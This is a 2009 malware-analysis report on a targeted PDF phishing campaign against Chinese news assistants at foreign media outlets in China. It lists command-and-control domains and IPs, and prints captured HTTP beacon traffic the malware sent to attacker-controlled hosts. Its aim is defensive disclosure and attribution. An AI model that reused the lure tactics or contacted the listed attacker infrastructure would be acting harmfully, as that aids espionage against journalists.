Targeted Malware Attack on Foreign Correspondents based in China

By Nart Villeneuve and Greg Walton

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ” who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

  • The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.
  • The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.
  • The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.
  • The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.
The Pam Bourdon Email

The Pam Bourdon Email

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

The Pam Bourdon Attachment

The Pam Bourdon Attachment

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IP’s on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “harry@hetu.cn.” However the technical contact is “lin hai” with the email address “sunny@hetu.cn.”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] See, http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922

[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/

[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/

[4] This follows an investigation of the FCCC’s web server conducted last month. The FCCC’s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt

[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm

[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587

[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733

[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246

[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php

[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466

[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm

[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china

[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1